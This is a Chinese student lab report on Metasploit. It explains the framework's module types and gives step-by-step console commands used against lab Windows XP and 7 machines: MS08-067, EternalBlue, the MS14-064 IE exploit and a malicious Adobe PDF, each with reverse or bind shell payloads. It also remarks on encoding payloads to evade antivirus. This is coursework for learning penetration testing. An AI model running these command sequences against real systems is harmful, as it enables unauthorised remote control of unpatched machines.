目錄

• 原理與實(shí)踐說明

• 實(shí)踐原理

• 實(shí)踐內(nèi)容概述

• 基礎(chǔ)問題回答

• 攻擊實(shí)例

• 在ms08_067中應(yīng)用use auxiliary/scanner/portscan/tcp搜索靶機(jī)開放端口（在ms08_067_netapi:自動(dòng)化漏洞溢出攻擊中有體現(xiàn)）

• Adobe

• payload:windows/meterpreter/bind_tcp(成功)

• ms14_064

• payload:windows/meterpreter/reverse_tcp(成功)

• payload:windows/meterpreter/reverse_https(失敗)

• ms08_067_netapi:自動(dòng)化漏洞溢出攻擊

• ms17_010_eternalblue:“永恒之藍(lán)”自動(dòng)化攻擊

• payload:generic/shell_bind_tcp（成功）

• payload:windows/x64/shell/reverse_tcp_uuid(成功)

• windows/x64/vncinject/reverse_tcp_uuid(成功且唯一)

• 主動(dòng)攻擊的實(shí)踐

• 攻擊瀏覽器的實(shí)踐

• 攻擊客戶端的實(shí)踐

• 成功應(yīng)用任何一個(gè)輔助模塊

• 離實(shí)戰(zhàn)還缺些什么技術(shù)或步驟

• 實(shí)驗(yàn)總結(jié)與體會(huì)

一.原理與實(shí)踐說明

1.實(shí)踐內(nèi)容

本實(shí)踐目標(biāo)是掌握metasploit的基本應(yīng)用方式，重點(diǎn)常用的三種攻擊方式的思路。具體需要完成：

• 一個(gè)主動(dòng)攻擊實(shí)踐，如ms08-067; （1分）

• 一個(gè)針對(duì)瀏覽器的攻擊，如ms11-050；（1分）

• 一個(gè)針對(duì)客戶端的攻擊，如Adobe；（1分）

• 成功應(yīng)用任何一個(gè)輔助模塊。（0.5分）

以上四個(gè)小實(shí)踐可不限于以上示例，并要求至少有一個(gè)是和其他所有同學(xué)不一樣的，否則扣除0.5分。

2.預(yù)備知識(shí)

一、MSF的六種模塊

Exploit模塊

• 是利用發(fā)現(xiàn)的安全漏洞或配置弱點(diǎn)對(duì)遠(yuǎn)程目標(biāo)系統(tǒng)進(jìn)行攻擊，以植入和運(yùn)行攻擊載荷，從而獲得對(duì)遠(yuǎn)程目標(biāo)系統(tǒng)訪問權(quán)的代碼組件。

• 形象點(diǎn)來(lái)說就是攻擊模塊

Payload模塊

• 是在滲透成功后促使目標(biāo)系統(tǒng)運(yùn)行的一端植入代碼，通常作用是為滲透攻擊者打開在目標(biāo)系統(tǒng)上的控制會(huì)話連接。實(shí)際上，該模塊就是計(jì)算機(jī)集成的針對(duì)不同操作系統(tǒng)實(shí)現(xiàn)shellcode攻擊的ruby代碼。

Encoder模塊

• 針對(duì)payload進(jìn)行編碼，可以通過多種編碼手段、多次編碼方式有效的改變payload代碼特征

• 不改變payload作用，但能對(duì)payload進(jìn)行加工

Aux模塊

• 能夠幫助滲透測(cè)試中在進(jìn)行滲透攻擊之前得到的目標(biāo)系統(tǒng)豐富的情報(bào)信息，從而發(fā)起更具目標(biāo)性的精準(zhǔn)攻擊。

• 主要包括針對(duì)各種網(wǎng)絡(luò)服務(wù)的掃描和查點(diǎn)、構(gòu)建虛假服務(wù)收集登錄密碼、口令猜測(cè)破解、敏感信息嗅探、探查敏感信息泄露、Fuzz測(cè)試發(fā)掘漏洞、實(shí)施網(wǎng)絡(luò)協(xié)議欺騙等模塊。

Post模塊

• 支持在滲透攻擊取得目標(biāo)系統(tǒng)遠(yuǎn)程控制權(quán)之后，在受控系統(tǒng)中進(jìn)行給各樣的后滲透攻擊動(dòng)作。

• 這里主要指的是攻擊之后可能用到的模塊

Nops模塊

• 是一些對(duì)程序運(yùn)行狀態(tài)不會(huì)造成任何實(shí)質(zhì)影響的空操作或無(wú)關(guān)操作指令，最典型的空指令就是空操作，在X86 CPU體系架構(gòu)平臺(tái)上的操作碼是0x90

• 因?yàn)橛行┐a返回地址很難確認(rèn)，所以在實(shí)際中有時(shí)候會(huì)填充一大段空指令，便于快速確定返回地址的位置

二、MSF常用漏洞利用命令

search name：用指定關(guān)鍵字搜索可以利用的漏洞模塊
use exploit name：使用漏洞
show options：顯示配置選項(xiàng)
set option name option：設(shè)置選項(xiàng)
show payloads：回鏈攻擊載荷
show targets 顯示目標(biāo)（os版本）
set TARGET target number：設(shè)置目標(biāo)版本
exploit：開始漏洞攻擊
sessions -l：列出會(huì)話
sessions -i id：選擇會(huì)話
sessions -k id：結(jié)束會(huì)話
Ctrl z：把會(huì)話放到后臺(tái)
Ctrl c：結(jié)束會(huì)話
show auxiliary：顯示輔助模塊
use auxiliary name ：使用輔助模塊
set option name option：設(shè)置選項(xiàng)
exploit：運(yùn)行模塊

3.基礎(chǔ)問題

問：用自己的話解釋什么是exploit,payload,encode。

• exploit測(cè)試者利用系統(tǒng)，程序，或服務(wù)的漏洞進(jìn)行攻擊的一個(gè)過程。

• payload攻擊者在目標(biāo)系統(tǒng)上執(zhí)行的一段攻擊代碼，該代碼具有返彈連接，創(chuàng)建用戶，執(zhí)行其他系統(tǒng)命令的功能。

• encodeencode編碼一是為了避免使攻擊載荷不能完整運(yùn)行的“壞字符”，二是為了改變特征碼，幫助攻擊載荷避免被殺軟發(fā)現(xiàn)。

攻擊實(shí)例

主動(dòng)攻擊的實(shí)踐

ms08-067

ms08_067_netapi是一款Metasploit中有點(diǎn)老的溢出攻擊載荷，攻擊可以獲得一個(gè)相對(duì)高的權(quán)限。

靶機(jī)：Microsoft Windows xp SP3

payload :generic/shell_reverse_tcp

測(cè)試靶機(jī)與攻擊機(jī)之間能否ping通

攻擊者試探靶機(jī)是否存在此漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 10.0.0.112

查看到靶機(jī)的版本號(hào)

查看到靶機(jī)存在此漏洞

msfconsole 打開控制臺(tái)，遇到以下提示，原因是沒有找到數(shù)據(jù)庫(kù)文件

輸入 service postgresql start

初始化MSF數(shù)據(jù)庫(kù)（關(guān)鍵步驟?。?code>msfdb init

search ms08-067 查看漏洞位置

use exploit/windows/smb/ms08_067_netapi 選擇該漏洞

set RHOSTS 192.168.1.148 設(shè)置靶機(jī)IP

利用輔助模塊查看端口是否開啟（默認(rèn)端口為445）

search portscan //搜索端口 
use auxiliary/scanner/portscan/tcp //使用漏洞 
show options //顯示設(shè)置 
set RHOSTS 192.168.1.148 //設(shè)置監(jiān)聽者地址 
exploit //攻擊

show targets查看targets，修改靶機(jī)的類型 set target 1 （也可以不修改）

show payloads 查看可用payload

選擇 set generic/shell_bind_tcp

set LHOST 192.168.1.147 設(shè)置監(jiān)聽者ip

set LPORT 5316 設(shè)置監(jiān)聽者端口號(hào)

show options 查看設(shè)置信息

exploit 進(jìn)行攻擊，攻擊成功！

ms17_010_eternalblue

靶機(jī)：Microsoft Windows 7(10.1.1.137)

payload : windows/x64/shell/reverse_tcp_uuid

實(shí)驗(yàn)步驟

==首先將虛擬機(jī)網(wǎng)絡(luò)設(shè)置為橋接。==

nmap --script=vuln 192.168.1.148 //查看靶機(jī)開放端口、是否存在ms17_010
search ms17_010//搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue//使用漏洞
show payloads//顯示可用攻擊載荷
set payload windows/x64/shell/reverse_tcp_uuid //選擇攻擊載荷
set LHOST 192.168.1.147 //設(shè)置監(jiān)聽地址
set LPORT 5316 //設(shè)置端口號(hào)
set RHOSTS 192.168.1.148 //設(shè)置靶機(jī)地址
show options//查看配置信息
exploit//開始攻擊

攻擊成功

換個(gè)載荷 windows/x64/vncinject/reverse_tcp_uuid

攻擊成功（獲得了一張桌面圖片，感覺像是一種輔助攻擊）

攻擊瀏覽器的實(shí)踐

ms14_064

• 此安全更新可解決 Microsoft Windows 對(duì)象鏈接與嵌入 (OLE) 中 2 個(gè)私下報(bào)告的漏洞。最嚴(yán)重的漏洞可能在用戶使用 Internet Explorer 查看經(jīng)特殊設(shè)計(jì)的網(wǎng)頁(yè)時(shí)允許遠(yuǎn)程執(zhí)行代碼。成功利用這些漏洞的攻擊者可以在當(dāng)前用戶的上下文中運(yùn)行任意代碼。如果當(dāng)前用戶使用管理用戶權(quán)限登錄，則攻擊者可隨后安裝程序；查看、更改或刪除數(shù)據(jù)；或者創(chuàng)建擁有完全用戶權(quán)限的新帳戶。遠(yuǎn)程攻擊者利用此漏洞通過構(gòu)造的網(wǎng)站執(zhí)行任意代碼，影響Win95 IE3 – Win10 IE11全版本。

靶機(jī)：WindowsXP IE 8.0

exploit : windows/browser/ms14_064_ole_code_execution

payload : windows/meterpreter/reverse_tcp

實(shí)驗(yàn)步驟

use exploit/windows/browser/ms14_064_ole_code_execution //選擇攻擊模塊
info //查看漏洞相關(guān)信息（發(fā)現(xiàn)可攻擊winXP和win7）
show payloads //顯示可用攻擊載荷
set payload windows/meterpreter/reverse_tcp //設(shè)置tcp反向連接
set SRVHOST 192.168.1.147 //設(shè)置攻方IP
set AllowPowerShellPrompt 1 //因?yàn)閙sf中自帶的漏洞利用exp調(diào)用的是powershell。 所以msf中的exp代碼只對(duì)安裝powershell的系統(tǒng)生效
set LHOST 192.168.1.147
set LPORT 5316
set target 0 //設(shè)置winXP靶機(jī)
exploit //發(fā)起攻擊

將生成的URL地址在winXP的IE中打開，發(fā)現(xiàn)成功建立了一個(gè)會(huì)話

輸入sessions查看會(huì)話相關(guān)信息

輸入sessions -i 1即可選擇第一個(gè)會(huì)話，調(diào)用shell權(quán)限成功

嘗試使用payload:windows/meterpreter/reverse_https，結(jié)果失敗了(它卡住了，應(yīng)該是XP的設(shè)置有問題)

攻擊客戶端的實(shí)踐

Adobe

靶機(jī)：Windows XP

payload : windows/meterpreter/bind_tcp

實(shí)驗(yàn)步驟

msfconsole //進(jìn)入控制臺(tái)
search adobe //進(jìn)行查找
use windows/fileformat/adobe_cooltype_sing  //使用漏洞
info //查看漏洞具體信息（重點(diǎn)當(dāng)然是description）
set payload windows/meterpreter/bind_tcp //選擇攻擊載荷
show options //查看詳細(xì)信息
set LPORT 5316 //設(shè)置端口號(hào)
set RHOST 192.168.1.148 //設(shè)置靶機(jī)IP地址
exploit #攻擊

將生成的msf.pdf復(fù)制到Windows XP中

kail中輸入back退出當(dāng)前模塊，進(jìn)入監(jiān)聽模塊

use exploit/multi/handler //進(jìn)入監(jiān)聽模塊
set payload windows/meterpreter/bind_tcp  //選擇攻擊載荷
show options //查看詳細(xì)信息
set RHOST 192.168.1.148 //設(shè)置靶機(jī)IP地址
set LPORT 5316 //設(shè)置端口號(hào)
exploit //攻擊
在靶機(jī)中使用雙擊打開msf.pdf

攻擊成功

三.離實(shí)戰(zhàn)還缺些什么技術(shù)或步驟

本次實(shí)驗(yàn)操作起來(lái)比較簡(jiǎn)單，邏輯也很清晰，絕大多數(shù)的時(shí)間花費(fèi)在了配置環(huán)境上。從windowsXP Professional sp2到windows XP SP3(English)，從IE 6.0到IE 7.0/8.0，Adobe Reader11到9，著實(shí)感受到了配置環(huán)境的艱辛，也體會(huì)到了metasploit攻擊漏洞的專一性，對(duì)操作系統(tǒng)和軟件版本都有細(xì)致的要求。必須要在特定環(huán)境和特定觸發(fā)條件下才能成功。如果放在實(shí)踐中，搜尋可以攻擊的模塊也是一個(gè)非常漫長(zhǎng)的過程。

同時(shí)，我們的攻擊是建立在前人的基礎(chǔ)上，很多漏洞都是經(jīng)過修復(fù)，不再適用，退一步來(lái)講，即使我們知道了系統(tǒng)漏洞，怎樣進(jìn)行有效的攻擊而不被發(fā)現(xiàn)又是一個(gè)巨大的難題。